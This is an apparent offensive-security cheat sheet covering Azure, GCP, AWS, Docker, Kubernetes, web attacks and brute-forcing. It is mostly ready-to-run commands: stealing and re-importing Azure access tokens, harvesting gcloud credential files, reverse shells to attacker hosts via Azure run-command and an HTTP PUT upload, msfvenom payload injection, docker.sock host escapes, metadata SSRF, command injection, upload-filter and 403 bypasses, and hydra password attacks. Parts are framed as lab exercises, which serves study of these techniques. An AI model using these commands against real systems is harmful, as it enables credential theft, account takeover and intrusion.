Steal Access Tokens
• Azure Cloud Service Packages (.cspkg)
• Deployment files created by Visual Studio
• Possible other Azure service integration (SQL, Storage, etc.)
• Look through cspkg zip files for creds/certs
• Search Visual Studio Publish directory
    \bin\debug\publish
• Azure Publish Settings files (.publishsettings)
   ◇ Designed to make it easier for developers to push code to Azure
   ◇ Can contain a Base64 encoded Management Certificate
   ◇ Sometimes cleartext credentials
   ◇ Open publishsettings file in text editor
   ◇ Save “ManagementCertificate” section into a new .pfx file
   ◇ There is no password for the pfx
   ◇ Search the user’s Downloads directory and VS projects
• Check %USERPROFILE&\.azure\ for auth tokens
• During an authenticated session with the Az PowerShell module a TokenCache.dat file gets generated in the %USERPROFILE%\.azure\ folder.
• Also search disk for other saved context files (.json)
• Multiple tokens can exist in the same context file

Post-Compromise
• What can we learn with a basic user?
• Subscription Info
• User Info
• Resource Groups
• Scavenging Runbooks for Creds
• Standard users can access Azure domain information and isn’t usually locked down
• Authenticated users can go to portal.azure.com and click Azure Active Directory
• O365 Global Address List has this info as well
• Even if portal is locked down PowerShell cmdlets will still likely work
• There is a company-wide setting that locks down the entire org from viewing Azure info via cmd line: Set-MsolCompanySettings – UsersPermissionToReadOtherUsersEnabled $false

Azure: CLI Access
• Azure Service Management (ASM or Azure “Classic”)
   ◇ Legacy and recommended to not use
• Azure Resource Manager (ARM)
   ◇ Added service principals, resource groups, and more
   ◇ Management Certs not supported
• PowerShell Modules
   ◇ Az, AzureAD & MSOnline
• Azure Cross-platform CLI Tools
   ◇ Linux and Windows client

Azure: Subscriptions
• Organizations can have multiple subscriptions
• A good first step is to determine what subscription you are in
• The subscription name is usually informative
• It might have “Prod”, or “Dev” in the title
• Multiple subscriptions can be under the same Azure AD directory (tenant)
• Each subscription can have multiple resource groups

Azure User Information
• Built-In Azure Subscription Roles
   ◇ Owner (full control over resource)
   ◇ Contributor (All rights except the ability to change permissions)
   ◇ Reader (can only read attributes)
   ◇ User Access Administrator (manage user access to Azure resources)
• Get the current user’s role assignement
    PS> Get-AzRoleAssignment
• If the Azure portal is locked down it is still possible to access Azure AD user information via MSOnline cmdlets
• The below examples enumerate users and groups
    PS> Get-MSolUser -All
    PS> Get-MSolGroup –All
    PS> Get-MSolGroupMember –GroupObjectId 
• Pipe Get-MSolUser –All to format list to get all user attributes
    PS> Get-MSolUser –All | fl

Azure Resource Groups
• Resource Groups collect various services for easier management
• Recon can help identify the relationships between services such as WebApps and SQL
    PS> Get-AzResource
    PS> Get-AzResourceGroup

Azure: Runbooks
• Azure Runbooks automate various tasks in Azure
• Require an Automation Account and can contain sensitive information like passwords
    PS> Get-AzAutomationAccount
    PS> Get-AzAutomationRunbook -AutomationAccountName  -ResourceGroupName 
• Export a runbook with:
    PS> Export-AzAutomationRunbook -AutomationAccountName  -ResourceGroupName  -Name  -OutputFolder .\Desktop\

Quick 1-liner to search all Azure AD user attributes for passwords after auth'ing with Connect-MsolService:  $x=Get-MsolUser;foreach($u in $x){$p = @();$u|gm|%{$p+=$_.Name};ForEach($s in $p){if($u.$s -like "*password*"){Write("[*]"+$u.UserPrincipalName+"["+$s+"]"+" : "+$u.$s)}}}

https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# Removing Azure services
- Under Azure Portal -> Resource Groups

Azure attacks examples

# Password spraying
https://github.com/dafthack/MSOLSpray/MSOLSpray.ps1
Create a text file with ten (10) fake users we will spray along with your own user account (YourAzureADUser@youraccount.onmicrosoft.com ). (Do not spray accounts you do not own. You may use my domain “glitchcloud.com” for generating fake target users) and save as userlist.txt

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password you set for your test account]

# Access Token

PS> Import-Module Az
PS> Connect-AzAccount
PS> mkdir C:\Temp
PS> Save-AzContext –Path C:\Temp\AzureAccessToken.json
PS> mkdir “C:\Temp\Live Tokens”

Open Windows Explorer and type %USERPROFILE%\.Azure\ and hit enter
• Copy TokenCache.dat & AzureRmContext.json to C:\Temp\Live Tokens
• Now close your authenticated PowerShell window!

Delete everything in %USERPROFILE%\.azure\
• Start a brand new PowerShell window and run:
PS> Import-Module Az
PS> Get-AzContext -ListAvailable
• You shouldn’t see any available contexts currently

• In your PowerShell window let’s manipulate the stolen TokenCache.dat and AzureRmContext.json files so we can import it into our PowerShell session

PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding byte
PS> $b64 = [Convert]::ToBase64String($bytes)
PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64

• Now let’s add the b64-token.txt to the AzureRmContext.json file.
• Open the C:\Temp\Live Tokens folder.
• Open AzureRmContext.json file in a notepad and find the line near the end of the file title “CacheData”. It should be null.
• Delete the word “null” on this line
• Where “null” was add two quotation marks (“”) and then paste the contents of b64-token.txt in between them.
• Save this file as C:\Temp\Live Tokens\StolenToken.json
• Let’s import the new token

PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json’

• We are now operating in an authenticated session to Azure

PS> $context = Get-AzContext
PS> $context.Account

• You can import the previously exported context (AzureAccessToken.json) the same way

# Azure situational awareness
• GOAL: Use the MSOnline and Az PowerShell modules to do basic enumeration of an Azure account post-compromise.
• In this lab you will authenticate to Azure using your Azure AD account you setup. Then, you will import the MSOnline and Az PowerShell modules and try out some of the various modules that assist in enumerating Azure resource usage.

• Start a new PowerShell window and import both the MSOnline and Az modules
    PS> Import-Module MSOnline
    PS> Import-Module Az
• Authenticate to each service with your Azure AD account:
    PS> Connect-AzAccount
    PS> Connect-MsolService
• First get some basic Azure information 
    PS> Get-MSolCompanyInformation
• Some interesting items here are
   ◇ UsersPermissionToReadOtherUsersEnabled
   ◇ DirSyncServiceAccount
   ◇ PasswordSynchronizationEnabled
   ◇ Address/phone/emails
• Next, we will start looking at the subscriptions associated with the account as well as look at the current context we are operating in. Look at the “Name” of the subscription and context for possible indication as to what it is associated with.
    PS> Get-AzSubscription
    PS> $context = Get-AzContext
    PS> $context.Name
    PS> $context.Account
• Enumerating the roles assigned to your user will help identify what permissions you might have on the subscription as well as who to target for escalation.
    PS> Get-AzRoleAssignment
• List out the users on the subscription. This is the equivalent of “net users /domain” in on-prem AD
    PS> Get-MSolUser -All
• The user you setup likely doesn’t have any resources currently associated with it, but these commands will help to understand the specific resources a user you gain access to has.
    PS> Get-AzResource
    PS> Get-AzResourceGroup
• There are many other functions.
• Use Get-Module to list out the other Az module groups
• To list out functions available within each module use the below command substituting the value of the “Name” parameter.
    PS> Get-Module -Name Az.Accounts | Select-Object -ExpandProperty ExportedCommands
    PS> Get-Module -Name MSOnline | Select-Object -ExpandProperty ExportedCommands

Azure Block Blobs(S3 equivalent) attacks

# Discovering with Google Dorks
site:*.blob.core.windows.net
site:*.blob.core.windows.net ext:xlsx | ext:csv "password"
# Discovering with Dns enumeration
python dnscan.py -d blob.core.windows.net -w subdomains-100.txt

# When you found one try with curl, an empty container respond with 400

Other Azure Services

# Azure App Services Subdomain Takeover
- For target example.com you found users.example.com
- Go https://users.galaxybutter.com and got an error
- dig CNAME users.galaxybutter.com and get an Azure App Services probably deprecated or removed
- Creat an App Service and point it to the missing CNAME
- Add a custom domain to the App Service
- Show custom content

# PoC from Forward DNS dataset
# This data is created by extracting domain names from a number of sources and then sending DNS queries for each domain.
https://opendata.rapid7.com/sonar.fdns_v2/
cat CNAME-DATASET-NAME | pigz -dc | grep -E "\.azurewebsites\.com"
cat CNAME-DATASET-NAME | pigz -dc | grep -E "\.s3\.amazonaws\.com"

# Azure Run Command
# Feature that allows you to execute commands without requiring SSH or SMB/RDP access to a machine. This is very similar to AWS SSM.
az login --use-device-code #Login
az group list #List groups
az vm list -g GROUP-NAME #List VMs inside group
#Linux VM
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "id"
#Windos VM
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunPowerShellScript --scripts "whoami"
# Linux Reverse Shell Azure Command
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "bash -c \"bash -i >& /dev/tcp/ATTACKER-EXTERNAL-IP/9090 0>&1\""

# Azure SQL Databases
- MSSQL syntaxis
- Dorks: "database.windows.net" site:pastebin.com

Azure Services Summary

Base services

Mobile

Storage

Networking

Management

Developer

GCP

**Tools**
# Hayat https://github.com/DenizParlak/hayat

Auth methods:
• Web Access
• API – OAuth 2.0 protocol
• Access tokens – short lived access tokens for service accounts
• JSON Key Files – Long-lived key-pairs
• Credentials can be federated

Recon:
• G-Suite Usage
   ◇ Try authenticating with a valid company email address at Gmail

Google Storage Buckets:
• Google Cloud Platform also has a storage service called “Buckets”
• Cloud_enum from Chris Moberly (@initstring) https://github.com/initstring/cloud_enum
   ◇ Awesome tool for scanning all three cloud services for buckets and more
      ▪ Enumerates:
         - GCP open and protected buckets as well as Google App Engine sites
         - Azure storage accounts, blob containers, hosted DBs, VMs, and WebApps
         - AWS open and protected buckets

Phising G-Suite:
• Calendar Event Injection
• Silently injects events to target calendars
• No email required
• Google API allows to mark as accepted
• Bypasses the “don’t auto-add” setting
• Creates urgency w/ reminder notification
• Include link to phishing page

Steal Access Tokens:
• Google JSON Tokens and credentials.db
• JSON tokens typically used for service account access to GCP
• If a user authenticates with gcloud from an instance their creds get stored here:
    ~/.config/gcloud/credentials.db
    sudo find /home -name "credentials.db"
• JSON can be used to authenticate with gcloud and ScoutSuite

Post-compromise
• Cloud Storage, Compute, SQL, Resource manager, IAM
• ScoutSuite from NCC group https://github.com/nccgroup/ScoutSuite
• Tool for auditing multiple different cloud security providers
• Create Google JSON token to auth as service account

gcp.sh

#!/bin/sh
set -- $(dig -t txt +short _cloud-netblocks.googleusercontent.com +trace)
included="" ip4=""
while [ $# -gt 0 ]; do
k="${1%%:*}" v="${1#*:}"
case "$k" in
include)
# only include once
if [ "${included% $v *}" = "${included}" ]; then
set -- "$@" $(dig -t txt +short "$v")
included=" $v $included"
fi
;;
ip4) ip4="$v $ip4" ;;
esac
shift
done
for i in $ip4; do
echo "$i"
done

Cloud OSINT

# Azure IP Ranges
https://azurerange.azurewebsites.net/

# AWS IP Range
https://ip-ranges.amazonaws.com/ip-ranges.json
- Get creation date
jq .createDate < ip-ranges.json
- Get info for specific region
jq  '.prefixes[] | select(.region=="us-east-1")' < ip-ranges.json
- Get all IPs
jq -r '.prefixes | .[].ip_prefix' < ip-ranges.json

# Online services
https://viewdns.info/
https://securitytrails.com/
https://www.shodan.io/search?query=net%3A%2234.227.211.0%2F24%22
https://censys.io/ipv4?q=s3

# Google Dorks
site:*.amazonaws.com -www "compute"
site:*.amazonaws.com -www "compute" "ap-south-1"
site:pastebin.com "rds.amazonaws.com" "u " pass OR password

# Check certificate transparency logs
https://crt.sh
%.netfilx.com

- AWS Buckets
site:*.s3.amazonaws.com ext:xls | ext:xlsx | ext:csv password|passwd|pass user|username|uid|email
bucket_finder ~/tools/AWSBucketDump/BucketNames.txt -l results.txt

- AWS discovering, stealing keys and endpoints
# Nimbostratus - check against acutal profile
https://github.com/andresriancho/nimbostratus
python nimbostratus dump-credentials

# ScoutSuite - audit AWS, GCP and Azure clouds
scout --provider aws --profile stolen

# Prowler - AWS security assessment, auditing and hardening
https://github.com/toniblyx/prowler

GitLab

GOAL: Identify a target code repository and then search through all commit history to discover secrets that have been mistakenly posted.
• Oftentimes, developers post access keys, or various other forms of credentials to code repositories on accident. Even if they remove the keys they may still be discoverable by searching through previous commit history.

sudo docker pull zricethezav/gitleaks
sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git

Then visualize a commit:
https://github.com/[git account]/[repo name]/commit/[commit ID]
https://github.com/zricethezav/gitleaks/commit/744ff2f876813fbd34731e6e0d600e1a26e858cf

Docker or Kubernetes

Docker basics

Concepts

• Docker Image
  • Read only file with OS, libraries and apps
  • Anyone can create a docker image
  • Images can be stored in Docker hub (default public registry) or private registry
• Docker Container
  • Stateful instance of an image with a writable layer
  • Contains everything needed to run your application
  • Based on one or more images
• Docker Registry
  • Repository of images
• Docker Hub
  • Public docker registry
• Dockerfile
  • Configuration file that contains instructions for building a Docker image
• Docker-compose file
  • Configuration file for docker-compose
• Docker Swarm
  • Group of machines that are running Docker and joined into a cluster.
  • When you run docker commands, they are executed by a swarm manager.
• Portainer
  • Management solution for Docker hosts and Docker Swarm clusters
  • Via web interface
• Docker capabilities
  • Turn the binary "root/non-root" into a fine-grained access control system.
  • Processes that just need to bind on a port below 1024 do not have to run as root, they can just be granted the net_bind_service capability instead.
• Docker Control Groups
  • Used to allocate cpu, memory, network bandwith of host to container groups.

Commands

# Search in docker hub
docker search wpscan
# Run docker container from docker hub
docker run ubuntu:latest echo "Welcome to Ubuntu"
# Run docker container from docker hub with interactive tty
docker run --name samplecontainer -it ubuntu:latest /bin/bash
# List running containers
docker ps
# List all containers
docker ps -a
# List docker images
docker images
# Run docker in background
docker run --name pingcontainer -d alpine:latest ping 127.0.0.1 -c 50
# Get container logs
docker logs -f pingcontainer
# Run container service in specified port
docker run -d --name nginxalpine -p 7777:80 nginx:alpine
# Access tty of running container
docker exec -it nginxalpine sh
# Get low-level info of docker object
docker inspect (container or image)
# Show image history
docker history jess/htop
# Stop container
docker stop dummynginx
# Remove container
docker rm dummynginx
# Run docker with specified PID namespace
docker run --rm -it --pid=host jess/htop

# Show logs
docker logs containername
docker logs -f containername
# Show service defined logs
docker service logs
# Look generated real time events by docker runtime
docker system events
docker events --since '10m'
docker events --filter 'image=alpine'
docker events --filter 'event=stop'

# Compose application (set up multicontainer docker app)
docker-compose up -d
# List docker volumes
docker volume ls
# Create volume
docker volume create vol1
# List docker networks
docker network ls
# Create docker network
docker network create net1
# Remove captability of container
docker run --rm -it --cap-drop=NET_RAW alpine sh
# Check capabilities inside container
docker run --rm -it 71aa5f3f90dc bash
capsh --print
# Run full privileged container
docker run --rm -it --privileged=true 71aa5f3f90dc bash
capsh --print
# From full privileged container you can access host devices
more /dev/kmsg

# Creating container groups
docker run -d --name='low_priority' --cpuset-cpus=0 --cpu-shares=10 alpine md5sum /dev/urandom
docker run -d --name='high_priority' --cpuset-cpus=0 --cpu-shares=50 alpine md5sum /dev/urandom
# Stopping cgroups
docker stop low_priority high_priority
# Remove cgroups
docker rm low_priority high_priority

# Setup docker swarm cluster
docker swarm init
# Check swarm nodes
docker node ls
# Start new service in cluster
docker service create --replicas 1 --publish 5555:80 --name nginxservice
nginx:alpine
# List services
docker service ls
# Inspect service
docker service inspect --pretty nginxservice
# Remove service
docker service rm nginxservice
# Leave cluster
docker swarm leave (--force if only one node)

# Start portainer
docker run -d -p 9000:9000 --name portainer \
--restart always -v /var/run/docker.sock:/var/run/docker.sock \
-v /opt/portainer:/data portainer/portainer

Docker security basics

# Get image checksum
docker images --digests ubuntu
# Check content trust to get signatures
docker trust inspect mediawiki --pretty
# Check vulns in container
- Look vulns in base image
- Use https://vulners.com/audit to check for docker packages
- Inside any container
cat /etc/issue
dpkg-query -W -f='${Package} ${Version} ${Architecture}\n'
- Using Trivy https://github.com/aquasecurity/trivy
trivy image knqyf263/vuln-image:1.2.3
# Check metadata, secrets, env variables
docker inspect <image name>
docker inspect <container name>
# Review image history
docker history image:latest
# Inspect everything
docker volume inspect wordpress_db_data
docker network inspect wordpress_default
# Interesting look in the volume mountpoints
docker volume inspect whatever
cd /var/lib/docker/volumes/whatever
# Integrity check for changed files
docker diff imagename
# Check if you're under a container
https://github.com/genuinetools/amicontained#usage
# Docker Bench Security (Security Auditor)
cd /opt/docker-bench-security
sudo bash docker-bench-security.sh

Attack insecure volume mounts

# After get reverse shell in docker container (eg insecure webapp with RCE)
# This commands are executed inside insecure docker container
# Check if it's available docker.sock
ls -l /var/run/docker.sock
# This allows to access the host docker service using host option with docker client by using the UNIX socket
# Now download docker client in container and run commands in host
./docker -H unix:///var/run/docker.sock ps
./docker -H unix:///var/run/docker.sock images

Attack docker misconfiguration

# Docker container with exposed ports running docker service
# Docker API is exposed in those docker ports
# Check query docker API with curl
curl 10.11.1.111:2375/images/json | jq .
# Then you can run commands in host machine
docker -H tcp://10.11.1.111:2375 ps
docker -H tcp://10.11.1.111:2375 images

Audit Docker Runtime and Registries

# Runtime

# Host with multiple dockers running
# Check docker daemon
docker system info
# Check docker API exposed on 0.0.0.0
cat /lib/systemd/system/docker.service
# Check if docker socket is running in any container
docker inspect | grep -i '/var/run/'
# Check rest of files docker related
ls -l /var/lib/docker/
# Check for any secret folder
ls -l /var/run/
ls -l /run/

# Public Registries
# Docker registry is a distribution system for Docker images. There will be diferent images and each may contain multiple tags and versions. By default the registry runs on port 5000 without authentication and TLS
# Check if docker registry is up and running
curl -s http://localhost:5000/v2/_catalog | jq .
# Get tags of docker image
curl -s http://localhost:5000/v2/devcode/tags/list | jq .
# Download image locally
docker pull localhost:5000/devcode:latest
# Access container to review it
docker run --rm -it localhost:5000/devcode:latest sh
# Once mounted we can check the docker daemon config to see user and registry
docker system info
# And we can check the registries configured for the creds
cat ~/.docker/config.json

# Private registries
# Check catalog
curl 10.11.1.111:5000/v2/_catalog
# Get image tags
curl 10.11.1.111:5000/v2/privatecode/tags/list
# Add the insecure-registry tag to download docker image
vi /lib/systemd/system/docker.service
ExecStart=/usr/bin/dockerd -H fd:// --insecure-registry 10.11.1.111:5000
# Restart docker service
sudo systemctl daemon-reload
sudo service docker restart
# Download the image
docker pull 10.11.1.111:5000/privatecode:whatevertag
# Enter inside container and enumerate
docker run --rm -it 10.11.1.111:5000/privatecode:golang-developer-team sh
cd /app
ls -la

Attack container capabilities

# Host with sys_ptrace capability enabled with host PID space. So it runs top command of host
# You're already inside container
# Check capabilities
capsh --print
# Upload reverse shell and linux-injector
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f raw -o payload.bin
# Check any process running as root
ps aux | grep root
./injector PID_RUNNING_AS_ROOT payload.bin

Kubernetes basics

Concepts

• Kubernetes is a security orchestrator
• Kubernetes master provides an API to interact with nodes
• Each Kubernetes node run kubelet to interact with API and kube-proxy to refect Kubernetes networking services on each node.
• Kubernetes objects are abstractions of states of your system.
  • Pods: collection of container share a network and namespace in the same node.
  • Services: Group of pods running in the cluster.
  • Volumes: directory accesible to all containers in a pod. Solves the problem of loose info when container crash and restart.
  • Namespaces: scope of Kubernetes objects, like a workspace (dev-space).

Commands

# kubectl cli for run commands against Kubernetes clusters
# Get info
kubectl cluster-info
# Get other objects info
kubectl get nodes
kubectl get pods
kubectl get services
# Deploy
kubectl run nginxdeployment --image=nginx:alpine
# Port forward to local machine
kubectl port-forward <PODNAME> 1234:80
# Deleting things
kubectl delete pod
# Shell in pod
kubectl exec -it <PODNAME> sh
# Check pod log
kubectl logs <PODNAME>
# List API resources
kubectl api-resources
# Check permissions
kubectl auth can-i create pods
# Get secrets
kubectl get secrets <SECRETNAME> -o yaml
# Get more info of specific pod
kubectl describe pod <PODNAME>
# Get cluster info
kubectl cluster-info dump

# kube-bench - secutity checker
kubectl apply -f kube-bench-node.yaml
kubectl get pods --selector job-name=kube-bench-node
kubectl logs kube-bench-podname
# kube-hunter - check security weaknesses
./kube-hunter.py
# kubeaudit
./kubeaudit all

# Known vulns
CVE-2018-1002105
CVE-2019-5736
CVE-2019-9901

Attak Private Registry miconfiguration

# Web application deployed vulnerable to lfi
# Read configuration through LFI
cat /root/.docker/config.json
# Download this file to your host and configure in your system
docker login -u _json_key -p "$(cat config.json)" https://gcr.io
# Pull the private registry image to get the backend source code
docker pull gcr.io/training-automation-stuff/backend-source-code:latest
# Inspect and enumerate the image
docker run --rm -it gcr.io/training-automation-stuff/backend-source-code:latest
# Check for secrets inside container
ls -l /var/run/secrets/kubernetes.io/serviceaccount/
# Check environment vars
printenv

Attack Cluster Metadata with SSRF

# Webapp that check the health of other web applications
# Request to 
curl http://169.254.169.254/computeMetadata/v1/
curl http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env

Attack escaping pod volume mounts to access node and host

# Webapp makes ping
# add some listing to find docker.sock
ping whatever;ls -l /custom/docker/
# Once found, download docker client
ping whatever;wget https://download.docker.com/linux/static/stable/x86_64/docker-18.09.1.tgz -O /root/docker-18.09.1.tgz
ping whatever;tar -xvzf /root/docker-18.09.1.tgz -C /root/
ping whatever;/root/docker/docker -H unix:///custom/docker/docker.sock ps
ping whatever;/root/docker/docker -H unix:///custom/docker/docker.sock images

CDN Domain Fronting

**Tools**
https://github.com/rvrsh3ll/FindFrontableDomains 
https://github.com/stevecoward/domain-fronting-tools

Web Attacks

Check out in the left submenu what common attack you want review

General Info

Auth headers

# Basic Auth (B64)
Authorization: Basic AXVubzpwQDU1dzByYM==
# Bearer Token (JWT)
Authorization: Bearer <token>
# API Key
GET /endpoint?api_key=abcdefgh123456789
X-API-Key: abcdefgh123456789
# Digest Auth
Authorization: Digest username=”admin” Realm=”abcxyz” nonce=”474754847743646”, uri=”/uri” response=”7cffhfr54685gnnfgerg8”
# OAuth2.0
Authorization: Bearer hY_9.B5f-4.1BfE
# Hawk Authentication
Authorization: Hawk id="abcxyz123", ts="1592459563", nonce="gWqbkw", mac="vxBCccCutXGV30gwEDKu1NDXSeqwfq7Z0sg/HP1HjOU="
# AWS signature
Authorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aws4_

Common checks

# robots.txt
curl http://example.com/robots.txt
# headers
wget --save-headers http://www.example.com/
    # Strict-Transport-Security (HSTS)
    # X-Frame-Options: SAMEORIGIN
    # X-XSS-Protection: 1; mode=block
    # X-Content-Type-Options: nosniff
# Cookies
    # Check Secure and HttpOnly flag in session cookie
    # If exists BIG-IP cookie, app behind a load balancer
# SSL Ciphers
nmap --script ssl-enum-ciphers -p 443 www.example.com
# HTTP Methods
nmap -p 443 --script http-methods www.example.com
# Cross Domain Policy
curl http://example.com/crossdomain.xml
    # allow-access-from domain="*"

# Cookies explained
https://cookiepedia.co.uk/

Security headers explanation

Quick tricks

# Web ports for nmap
80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672

# Technology scanner
# https://github.com/urbanadventurer/WhatWeb
whatweb htttps://url.com

# Screenshot web
# https://github.com/maaaaz/webscreenshot
# https://github.com/sensepost/gowitness
# https://github.com/michenriksen/aquatone

# Get error with in input
%E2%A0%80%0A%E2%A0%80

# Retrieve additional info:
/favicon.ico/..%2f
/lol.png%23
/../../../
?debug=1
/server-status
/files/..%2f..%2f

# Change default header to accept */*
Accept: application/json, text/javascript, */*; q=0.01

# Sitemap to wordlist (httpie)
http https://target.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' > wordlist_endpoints.txt

# Bypass Rate Limits:
# Use different params: 
    sign-up, Sign-up, SignUp
# Null byte on params:
    %00, %0d%0a, %09, %0C, %20, %0

# Bypass upload restrictions:
# Change extension: .pHp3 or pHp3.jpg
# Modify mimetype: Content-type: image/jpeg
# Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
# Add gif header: GIF89a;
# All at the same time.

# ImageTragic (memory leaks in gif preview)
# https://github.com/neex/gifoeb
./gifoeb gen 512x512 dump.gif
# Upload dump.gif multiple times, check if preview changes.
# Check docs for exploiting

# If upload from web is allowed or :
# https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888
# https://iplogger.org/invisible/
# https://iplogger.org/15bZ87

# Check HTTP options:
# Check if it is possible to upload
curl -v -k -X OPTIONS https://10.11.1.111/
# If put enabled, upload:
curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “/root/Desktop/meterpreter.php” http://VICTIMIP:8585/uploads/meterpreter.php
# If PUT is not allowed, try to override:
X-HTTP-Method-Override: PUT
X-Method-Override: PUT

# Retrieve endpoints
# LinkFinder
# https://github.com/GerbenJavado/LinkFinder
python linkfinder.py -i https://example.com -d
python linkfinder.py -i burpfile -b

# Retreive hidden parameters
# Tools
# https://github.com/s0md3v/Arjun
python3 arjun.py -u https://url.com --get 
python3 arjun.py -u https://url.com --post
# https://github.com/maK-/parameth
python parameth.py -u https://example.com/test.php
# https://github.com/devanshbatham/ParamSpider
python3 paramspider.py --domain example.com
# https://github.com/s0md3v/Parth
python3 parth.py -t example.com

# .DS_Store files?
# https://github.com/gehaxelt/Python-dsstore
python main.py samples/.DS_Store.ctf

# Polyglot RCE payload
1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS}

# Nmap web scan
nmap --script "http-*" example.com -p 443

# SQLi + XSS + SSTI
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection 
"><svg/onload=prompt(5);> ==> for XSS 
{{7*7}} ==> for SSTI/CSTI

# Try to connect with netcat to port 80
nc -v host 80

# Understand URL params with unfurl
https://dfir.blog/unfurl/

Header injections

Headers

# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
Client-IP:
Connection:
Contact:
Forwarded:
From:
Host:
Origin:
Referer:
True-Client-IP:
X-Client-IP:
X-Custom-IP-Authorization:
X-Forward-For:
X-Forwarded-For:
X-Forwarded-Host:
X-Forwarded-Server:
X-Host:
X-Original-URL:
X-Originating-IP:
X-Real-IP:
X-Remote-Addr:
X-Remote-IP:
X-Rewrite-URL:
X-Wap-Profile:

# Try to repeat same Host header 2 times
Host: legit.com
Stuff: stuff
Host: evil.com

# Bypass type limit
Accept: application/json, text/javascript, */*; q=0.01
Accept: ../../../../../../../../../etc/passwd{{'

# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header

# 401/403 bypasses 
# Whitelisted IP 127.0.0.1 or localhost
Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1

# Fake Origin - make GET request to accesible endpoint with:
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Referer: /admin
# Also try with absoulte url https:/domain.com/admin

# Method Override
X-HTTP-Method-Override: PUT

# Provide full path GET
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com

# Add line wrapping
GET /index.php HTTP/1.1
 Host: vulnerable-website.com
Host: evil-website.com

# Wordlists
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers

Tools

# https://github.com/lobuhi/byp4xx
./byp4xx.sh https://url/path
# https://github.com/OdinF13/Bug-Bounty-Scripts

# https://github.com/mlcsec/headi
headi -url http://target.com/admin

Bruteforcing

cewl
hash-identifier
# https://github.com/HashPals/Name-That-Hash
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
patator http_fuzz url=https://10.10.10.10:3001/login method=POST accept_cookie=1 body='{"user":"admin","password":"FILE0","email":""}' 0=/root/acronim_dict.txt follow=1 -x ignore:fgrep='HTTP/2 422'
hydra -l root -P password-file.txt 10.11.1.111 ssh
hydra -P password-file.txt -v 10.11.1.111 snmp
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V
hydra -L username.txt -p paswordl33t -t 4 ssh://10.10.1.111
hydra -L user.txt -P pass.txt 10.10.1.111 ftp

# PATATOR
